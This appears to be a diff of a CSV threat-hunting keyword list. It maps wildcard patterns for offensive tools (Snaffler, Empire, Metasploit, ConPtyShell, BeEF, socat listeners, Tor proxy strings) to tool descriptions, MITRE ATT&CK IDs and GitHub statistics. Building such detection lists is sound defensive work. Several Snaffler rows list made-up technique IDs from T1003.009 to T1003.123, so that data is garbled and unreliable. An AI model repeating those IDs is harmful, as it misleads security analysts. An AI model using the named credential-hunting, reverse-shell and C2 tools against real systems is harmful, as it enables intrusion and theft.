T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnafflerMessage.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - 
T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnafflerMessageType.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - 
T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" "*SnaffPoint.exe*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*SnaffPoint-main*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*snallygaster*","offensive_tool_keyword","snallygaster","Finds file leaks and other security problems on HTTP servers.snallygaster is a tool that looks for files accessible on web servers that shouldn't be public and can pose a security risk.","T1595.001 - T1210","TA0007 - TA0009","N/A","N/A","Information Gathering","https://github.com/hannob/snallygaster","1","0","N/A","N/A","10","2009","240","2023-07-31T07:26:19Z","2018-04-10T12:01:16Z" -"*sneaky_gophish*","offensive_tool_keyword","gophish","Hiding GoPhish from the boys in blue","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/puzzlepeaches/sneaky_gophish/","1","1","N/A","10","10","134","37","2022-12-06T11:58:00Z","2021-06-24T12:41:54Z" +"*sneaky_gophish*","offensive_tool_keyword","gophish","Hiding GoPhish from the boys in blue","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/puzzlepeaches/sneaky_gophish/","1","1","N/A","10","10","135","38","2022-12-06T11:58:00Z","2021-06-24T12:41:54Z" "*SniffAir*","offensive_tool_keyword","SniffAir","SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic. looking for potential security flaws. Along with the prebuilt queries. SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.","T1530 - T1170 - T1059 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Tylous/SniffAir","1","1","N/A","N/A","10","1161","175","2020-10-14T04:00:27Z","2017-02-20T18:32:32Z" -"*sniffer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*sniffer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*sniffer-master.zip*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" -"*SnifferSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SnifferSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*sniffglue*","offensive_tool_keyword","sniffglue","Secure multithreaded packet sniffer","T1040 - T1041 - T1046 - T1057 - T1071.001","TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/sniffglue","1","0","N/A","N/A","10","970","89","2022-07-13T22:44:18Z","2017-09-12T16:26:24Z" -"*snmp_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*snmp_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*snmpwn *passwords.txt*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. 
It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*snmpwn.rb* --hosts *","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*socat *","offensive_tool_keyword","socat","socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file. pipe. device","T1048 - T1055 - T1562","TA0003 - TA0002 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/craSH/socat","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*socat tcp4-listen:1337*","offensive_tool_keyword","socat","listening on port 1337 -observed in variousmalware and poc explitation tools","T1049 - T1021.001 - T1572","TA0002 - TA0011 - TA0040","N/A","N/A","C2","N/A","1","0","N/A","8","6","N/A","N/A","N/A","N/A" -"*Social Engineer Toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. 
LLC an information security consulting firm located in Cleveland. Ohio.","T1566 - T1059.004 - T1564.001","TA0001 - TA0002 - TA0007","N/A","N/A","Phishing","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" -"*social_engineering/web_cloner*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Social Engineer Toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC an information security consulting firm located in Cleveland. Ohio.","T1566 - T1059.004 - T1564.001","TA0001 - TA0002 - TA0007","N/A","N/A","Phishing","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*social_engineering/web_cloner*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*SocialPwned.git*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" "*socialpwned.py*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" "*socialpwned_*.txt*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" -"*SocketHijacking.*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*SocketHijacking.*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*socks*127.0.0.1 9050*","offensive_tool_keyword","proxychains","(TOR default) proxychains - a tool that 
forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" "*socks5_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*socks5h://127.0.0.1:9050*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" -"*socky whoami*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","79","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*socky whoami*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*Soledge/BlockEtw*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*souravbaghz/RadareEye*","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","1","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" "*source/avetsvc.c*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" -"*source/byakugan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*source/dllinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*source/flash_exploiter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*source/javapayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*source/psh_exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*source/byakugan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" 